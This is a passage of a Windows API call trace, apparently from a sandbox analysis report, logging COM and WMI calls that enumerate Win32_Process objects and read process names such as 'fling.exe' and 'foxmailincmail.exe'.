puReturned=0x267acc0*=0x1) returned 0x0 [0213.888] IUnknown:QueryInterface (in: This=0x560dfd0, riid=0x72502a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38e62c | out: ppvObject=0x38e62c*=0x560dfd0) returned 0x0 [0213.888] IUnknown:QueryInterface (in: This=0x560dfd0, riid=0x725f1b6c*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x38e5e0 | out: ppvObject=0x38e5e0*=0x0) returned 0x80004002 [0213.888] IUnknown:QueryInterface (in: This=0x560dfd0, riid=0x725f1e84*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x38e408 | out: ppvObject=0x38e408*=0x0) returned 0x80004002 [0213.888] IUnknown:AddRef (This=0x560dfd0) returned 0x3 [0213.888] IUnknown:QueryInterface (in: This=0x560dfd0, riid=0x725f182c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x38df3c | out: ppvObject=0x38df3c*=0x0) returned 0x80004002 [0213.888] IUnknown:QueryInterface (in: This=0x560dfd0, riid=0x725f1764*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x38deec | out: ppvObject=0x38deec*=0x0) returned 0x80004002 [0213.888] IUnknown:QueryInterface (in: This=0x560dfd0, riid=0x72521388*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38def8 | out: ppvObject=0x38def8*=0x560dfd4) returned 0x0 [0213.888] IMarshal:GetUnmarshalClass (in: This=0x560dfd4, riid=0x72502a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x38df00 | out: pCid=0x38df00*(Data1=0x4590f812, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24))) returned 0x0 [0213.888] IUnknown:Release (This=0x560dfd4) returned 0x3 [0213.888] CoGetContextToken (in: pToken=0x38df58 | out: pToken=0x38df58) returned 0x0 [0213.888] CoGetContextToken (in: pToken=0x38e36c | out: pToken=0x38e36c) returned 0x0 [0213.888] IUnknown:QueryInterface (in: This=0x560dfd0, riid=0x725f1aa8*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38e3ec | out: ppvObject=0x38e3ec*=0x0) returned 0x80004002 [0213.888] IUnknown:Release (This=0x560dfd0) returned 0x2 [0213.888] CoGetContextToken (in: pToken=0x38e954 | out: pToken=0x38e954) returned 0x0 [0213.888] CoGetContextToken (in: pToken=0x38e8b4 | out: pToken=0x38e8b4) returned 0x0 [0213.889] IUnknown:QueryInterface (in: This=0x560dfd0, riid=0x38e984*(Data1=0xdc12a681, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x38e980 | out: ppvObject=0x38e980*=0x560dfd0) returned 0x0 [0213.889] IUnknown:AddRef (This=0x560dfd0) returned 0x4 [0213.889] IUnknown:Release (This=0x560dfd0) returned 0x3 [0213.889] IUnknown:Release (This=0x560dfd0) returned 0x2 [0213.889] CoTaskMemFree (pv=0x561be68) [0213.889] CoGetContextToken (in: pToken=0x38ecc4 | out: pToken=0x38ecc4) returned 0x0 [0213.889] IUnknown:AddRef (This=0x560dfd0) returned 0x3 [0213.889] IWbemClassObject:Get (in: This=0x560dfd0, wszName="__GENUS", lFlags=0, pVal=0x38efc4*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x38f044*=0, plFlavor=0x38f040*=0 | out: pVal=0x38efc4*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), pType=0x38f044*=3, plFlavor=0x38f040*=64) returned 0x0 [0213.889] IWbemClassObject:Get (in: This=0x560dfd0, wszName="__PATH", lFlags=0, pVal=0x38efa8*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x38f02c*=0, plFlavor=0x38f028*=0 | out: pVal=0x38efa8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"2888\"", varVal2=0x0), pType=0x38f02c*=8, plFlavor=0x38f028*=64) returned 0x0 [0213.889] SysStringByteLen (bstr="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"2888\"") returned 0x66 [0213.889] SysStringByteLen (bstr="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"2888\"") returned 0x66 [0213.889] CoGetObjectContext (in: riid=0x25c02c4*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x38efd4 | out: ppv=0x38efd4*=0x6d0cac) returned 0x0 [0213.890] IComThreadingInfo:GetCurrentApartmentType (in: This=0x6d0cac, pAptType=0x38efcc | out: pAptType=0x38efcc*=1) returned 0x0 [0213.890] IUnknown:QueryInterface (in: This=0x6d0cac, riid=0x25c02ac*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x38efd0 | out: ppvObject=0x38efd0*=0x0) returned 0x80004002 [0213.890] IUnknown:Release (This=0x6d0cac) returned 0x1 [0213.890] CoGetClassObject (in: rclsid=0x55b3f5c*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x72656bd4*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x38e940 | out: ppv=0x38e940*=0x561be68) returned 0x0 [0213.891] WbemDefPath:IUnknown:QueryInterface (in: This=0x561be68, riid=0x7261dd3c*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x38eb58 | out: ppvObject=0x38eb58*=0x0) returned 0x80004002 [0213.891] WbemDefPath:IClassFactory:CreateInstance (in: This=0x561be68, pUnkOuter=0x0, riid=0x72502a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38eb64 | out: ppvObject=0x38eb64*=0x561a580) returned 0x0 [0213.891] WbemDefPath:IUnknown:Release (This=0x561be68) returned 0x0 [0213.891] WbemDefPath:IUnknown:QueryInterface (in: This=0x561a580, riid=0x72502a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38e784 | out: ppvObject=0x38e784*=0x561a580) returned 0x0 [0213.891] WbemDefPath:IUnknown:QueryInterface (in: This=0x561a580, riid=0x725f1b6c*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x38e738 | out: ppvObject=0x38e738*=0x0) returned 0x80004002 [0213.891] WbemDefPath:IUnknown:AddRef (This=0x561a580) returned 0x3 [0213.891] WbemDefPath:IUnknown:QueryInterface (in: This=0x561a580, riid=0x725f182c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x38e094 | out: ppvObject=0x38e094*=0x0) returned 0x80004002 [0213.891] WbemDefPath:IUnknown:QueryInterface (in: This=0x561a580, riid=0x725f1764*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x38e044 | out: ppvObject=0x38e044*=0x0) returned 0x80004002 [0213.891] WbemDefPath:IUnknown:QueryInterface (in: This=0x561a580, riid=0x72521388*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38e050 | out: ppvObject=0x38e050*=0x561be78) returned 0x0 [0213.891] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x561be78, riid=0x72502a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x38e058 | out: pCid=0x38e058*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0213.891] WbemDefPath:IUnknown:Release (This=0x561be78) returned 0x3 [0213.891] CoGetContextToken (in: pToken=0x38e0b0 | out: pToken=0x38e0b0) returned 0x0 [0213.891] CoGetContextToken (in: pToken=0x38e4c4 | out: pToken=0x38e4c4) returned 0x0 [0213.891] WbemDefPath:IUnknown:QueryInterface (in: This=0x561a580, riid=0x725f1aa8*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38e544 | out: ppvObject=0x38e544*=0x0) returned 0x80004002 [0213.891] WbemDefPath:IUnknown:Release (This=0x561a580) returned 0x2 [0213.891] WbemDefPath:IUnknown:Release (This=0x561a580) returned 0x1 [0213.891] CoGetContextToken (in: pToken=0x38ee54 | out: pToken=0x38ee54) returned 0x0 [0213.891] CoGetContextToken (in: pToken=0x38edb4 | out: pToken=0x38edb4) returned 0x0 [0213.892] WbemDefPath:IUnknown:QueryInterface (in: This=0x561a580, riid=0x38ee84*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x38ee80 | out: ppvObject=0x38ee80*=0x561a580) returned 0x0 [0213.892] WbemDefPath:IUnknown:AddRef (This=0x561a580) returned 0x3 [0213.892] WbemDefPath:IUnknown:Release (This=0x561a580) returned 0x2 [0213.892] WbemDefPath:IWbemPath:SetText (This=0x561a580, uMode=0x4, pszPath="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"2888\"") returned 0x0 [0213.892] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x53abde8, puCount=0x38f000 | out: puCount=0x38f000*=0x2) returned 0x0 [0213.892] WbemDefPath:IWbemPath:GetText (in: This=0x53abde8, lFlags=4, puBuffLength=0x38effc*=0x0, pszText=0x0 | out: puBuffLength=0x38effc*=0xf, pszText=0x0) returned 0x0 [0213.892] WbemDefPath:IWbemPath:GetText (in: This=0x53abde8, lFlags=4, puBuffLength=0x38effc*=0xf, pszText="00000000000000" | out: puBuffLength=0x38effc*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0213.892] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x53abde8, puCount=0x38efcc | out: puCount=0x38efcc*=0x2) returned 0x0 [0213.892] WbemDefPath:IWbemPath:GetText (in: This=0x53abde8, lFlags=4, puBuffLength=0x38efc8*=0x0, pszText=0x0 | out: puBuffLength=0x38efc8*=0xf, pszText=0x0) returned 0x0 [0213.892] WbemDefPath:IWbemPath:GetText (in: This=0x53abde8, lFlags=4, puBuffLength=0x38efc8*=0xf, pszText="00000000000000" | out: puBuffLength=0x38efc8*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0213.892] IWbemClassObject:Get (in: This=0x560dfd0, wszName="Name", lFlags=0, pVal=0x38efc8*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x268a2c4*=0, plFlavor=0x268a2c8*=0 | out: pVal=0x38efc8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="fling.exe", varVal2=0x0), pType=0x268a2c4*=8, plFlavor=0x268a2c8*=0) returned 0x0 [0213.892] SysStringByteLen (bstr="fling.exe") returned 0x12 [0213.892] SysStringByteLen (bstr="fling.exe") returned 0x12 [0213.892] IWbemClassObject:Get (in: This=0x560dfd0, wszName="Name", lFlags=0, pVal=0x38efd0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x268a2c4*=8, plFlavor=0x268a2c8*=0 | out: pVal=0x38efd0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="fling.exe", varVal2=0x0), pType=0x268a2c4*=8, plFlavor=0x268a2c8*=0) returned 0x0 [0213.892] SysStringByteLen (bstr="fling.exe") returned 0x12 [0213.892] SysStringByteLen (bstr="fling.exe") returned 0x12 [0213.892] CoTaskMemAlloc (cb=0x4) returned 0x561bea8 [0213.892] IEnumWbemClassObject:Next (in: This=0x544f098, lTimeout=-1, uCount=0x1, apObjects=0x561bea8, puReturned=0x267acc0 | out: apObjects=0x561bea8*=0x560e168, puReturned=0x267acc0*=0x1) returned 0x0 [0213.966] IUnknown:QueryInterface (in: This=0x560e168, riid=0x72502a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38e62c | out: ppvObject=0x38e62c*=0x560e168) returned 0x0 [0213.966] IUnknown:QueryInterface (in: This=0x560e168, riid=0x725f1b6c*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x38e5e0 | out: ppvObject=0x38e5e0*=0x0) returned 0x80004002 [0213.966] IUnknown:QueryInterface (in: This=0x560e168, riid=0x725f1e84*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x38e408 | out: ppvObject=0x38e408*=0x0) returned 0x80004002 [0213.966] IUnknown:AddRef (This=0x560e168) returned 0x3 [0213.966] IUnknown:QueryInterface (in: This=0x560e168, riid=0x725f182c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x38df3c | out: ppvObject=0x38df3c*=0x0) returned 0x80004002 [0213.966] IUnknown:QueryInterface (in: This=0x560e168, riid=0x725f1764*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x38deec | out: ppvObject=0x38deec*=0x0) returned 0x80004002 [0213.966] IUnknown:QueryInterface (in: This=0x560e168, riid=0x72521388*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38def8 | out: ppvObject=0x38def8*=0x560e16c) returned 0x0 [0213.966] IMarshal:GetUnmarshalClass (in: This=0x560e16c, riid=0x72502a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x38df00 | out: pCid=0x38df00*(Data1=0x4590f812, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24))) returned 0x0 [0213.967] IUnknown:Release (This=0x560e16c) returned 0x3 [0213.967] CoGetContextToken (in: pToken=0x38df58 | out: pToken=0x38df58) returned 0x0 [0213.967] CoGetContextToken (in: pToken=0x38e36c | out: pToken=0x38e36c) returned 0x0 [0213.967] IUnknown:QueryInterface (in: This=0x560e168, riid=0x725f1aa8*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38e3ec | out: ppvObject=0x38e3ec*=0x0) returned 0x80004002 [0213.967] IUnknown:Release (This=0x560e168) returned 0x2 [0213.967] CoGetContextToken (in: pToken=0x38e954 | out: pToken=0x38e954) returned 0x0 [0213.967] CoGetContextToken (in: pToken=0x38e8b4 | out: pToken=0x38e8b4) returned 0x0 [0213.967] IUnknown:QueryInterface (in: This=0x560e168, riid=0x38e984*(Data1=0xdc12a681, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x38e980 | out: ppvObject=0x38e980*=0x560e168) returned 0x0 [0213.967] IUnknown:AddRef (This=0x560e168) returned 0x4 [0213.967] IUnknown:Release (This=0x560e168) returned 0x3 [0213.967] IUnknown:Release (This=0x560e168) returned 0x2 [0213.967] CoTaskMemFree (pv=0x561bea8) [0213.967] CoGetContextToken (in: pToken=0x38ecc4 | out: pToken=0x38ecc4) returned 0x0 [0213.967] IUnknown:AddRef (This=0x560e168) returned 0x3 [0213.968] IWbemClassObject:Get (in: This=0x560e168, wszName="__GENUS", lFlags=0, pVal=0x38efc4*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x38f044*=0, plFlavor=0x38f040*=0 | out: pVal=0x38efc4*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), pType=0x38f044*=3, plFlavor=0x38f040*=64) returned 0x0 [0213.968] IWbemClassObject:Get (in: This=0x560e168, wszName="__PATH", lFlags=0, pVal=0x38efa8*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x38f02c*=0, plFlavor=0x38f028*=0 | out: pVal=0x38efa8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"2896\"", varVal2=0x0), pType=0x38f02c*=8, plFlavor=0x38f028*=64) returned 0x0 [0213.968] SysStringByteLen (bstr="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"2896\"") returned 0x66 [0213.968] SysStringByteLen (bstr="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"2896\"") returned 0x66 [0213.968] CoGetObjectContext (in: riid=0x25c02c4*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x38efd4 | out: ppv=0x38efd4*=0x6d0cac) returned 0x0 [0213.968] IComThreadingInfo:GetCurrentApartmentType (in: This=0x6d0cac, pAptType=0x38efcc | out: pAptType=0x38efcc*=1) returned 0x0 [0213.968] IUnknown:QueryInterface (in: This=0x6d0cac, riid=0x25c02ac*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x38efd0 | out: ppvObject=0x38efd0*=0x0) returned 0x80004002 [0213.968] IUnknown:Release (This=0x6d0cac) returned 0x1 [0213.970] CoGetClassObject (in: rclsid=0x55b3f5c*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x72656bd4*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x38e940 | out: ppv=0x38e940*=0x561bea8) returned 0x0 [0213.970] WbemDefPath:IUnknown:QueryInterface (in: This=0x561bea8, riid=0x7261dd3c*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x38eb58 | out: ppvObject=0x38eb58*=0x0) returned 0x80004002 [0213.970] WbemDefPath:IClassFactory:CreateInstance (in: This=0x561bea8, pUnkOuter=0x0, riid=0x72502a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38eb64 | out: ppvObject=0x38eb64*=0x561a660) returned 0x0 [0213.970] WbemDefPath:IUnknown:Release (This=0x561bea8) returned 0x0 [0213.970] WbemDefPath:IUnknown:QueryInterface (in: This=0x561a660, riid=0x72502a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38e784 | out: ppvObject=0x38e784*=0x561a660) returned 0x0 [0213.970] WbemDefPath:IUnknown:QueryInterface (in: This=0x561a660, riid=0x725f1b6c*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x38e738 | out: ppvObject=0x38e738*=0x0) returned 0x80004002 [0213.971] WbemDefPath:IUnknown:AddRef (This=0x561a660) returned 0x3 [0213.971] WbemDefPath:IUnknown:QueryInterface (in: This=0x561a660, riid=0x725f182c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x38e094 | out: ppvObject=0x38e094*=0x0) returned 0x80004002 [0213.971] WbemDefPath:IUnknown:QueryInterface (in: This=0x561a660, riid=0x725f1764*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x38e044 | out: ppvObject=0x38e044*=0x0) returned 0x80004002 [0213.971] WbemDefPath:IUnknown:QueryInterface (in: This=0x561a660, riid=0x72521388*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38e050 | out: ppvObject=0x38e050*=0x561beb8) returned 0x0 [0213.971] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x561beb8, riid=0x72502a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x38e058 | out: pCid=0x38e058*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0213.971] WbemDefPath:IUnknown:Release (This=0x561beb8) returned 0x3 [0213.971] CoGetContextToken (in: pToken=0x38e0b0 | out: pToken=0x38e0b0) returned 0x0 [0213.971] CoGetContextToken (in: pToken=0x38e4c4 | out: pToken=0x38e4c4) returned 0x0 [0213.971] WbemDefPath:IUnknown:QueryInterface (in: This=0x561a660, riid=0x725f1aa8*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38e544 | out: ppvObject=0x38e544*=0x0) returned 0x80004002 [0213.971] WbemDefPath:IUnknown:Release (This=0x561a660) returned 0x2 [0213.971] WbemDefPath:IUnknown:Release (This=0x561a660) returned 0x1 [0213.971] CoGetContextToken (in: pToken=0x38ee54 | out: pToken=0x38ee54) returned 0x0 [0213.971] CoGetContextToken (in: pToken=0x38edb4 | out: pToken=0x38edb4) returned 0x0 [0213.971] WbemDefPath:IUnknown:QueryInterface (in: This=0x561a660, riid=0x38ee84*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x38ee80 | out: ppvObject=0x38ee80*=0x561a660) returned 0x0 [0213.971] WbemDefPath:IUnknown:AddRef (This=0x561a660) returned 0x3 [0213.971] WbemDefPath:IUnknown:Release (This=0x561a660) returned 0x2 [0213.971] WbemDefPath:IWbemPath:SetText (This=0x561a660, uMode=0x4, pszPath="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"2896\"") returned 0x0 [0213.972] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x53abde8, puCount=0x38f000 | out: puCount=0x38f000*=0x2) returned 0x0 [0213.972] WbemDefPath:IWbemPath:GetText (in: This=0x53abde8, lFlags=4, puBuffLength=0x38effc*=0x0, pszText=0x0 | out: puBuffLength=0x38effc*=0xf, pszText=0x0) returned 0x0 [0213.972] WbemDefPath:IWbemPath:GetText (in: This=0x53abde8, lFlags=4, puBuffLength=0x38effc*=0xf, pszText="00000000000000" | out: puBuffLength=0x38effc*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0213.972] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x53abde8, puCount=0x38efcc | out: puCount=0x38efcc*=0x2) returned 0x0 [0213.972] WbemDefPath:IWbemPath:GetText (in: This=0x53abde8, lFlags=4, puBuffLength=0x38efc8*=0x0, pszText=0x0 | out: puBuffLength=0x38efc8*=0xf, pszText=0x0) returned 0x0 [0213.972] WbemDefPath:IWbemPath:GetText (in: This=0x53abde8, lFlags=4, puBuffLength=0x38efc8*=0xf, pszText="00000000000000" | out: puBuffLength=0x38efc8*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0213.972] IWbemClassObject:Get (in: This=0x560e168, wszName="Name", lFlags=0, pVal=0x38efc8*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x268ab34*=0, plFlavor=0x268ab38*=0 | out: pVal=0x38efc8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="foxmailincmail.exe", varVal2=0x0), pType=0x268ab34*=8, plFlavor=0x268ab38*=0) returned 0x0 [0213.972] SysStringByteLen (bstr="foxmailincmail.exe") returned 0x24 [0213.972] SysStringByteLen 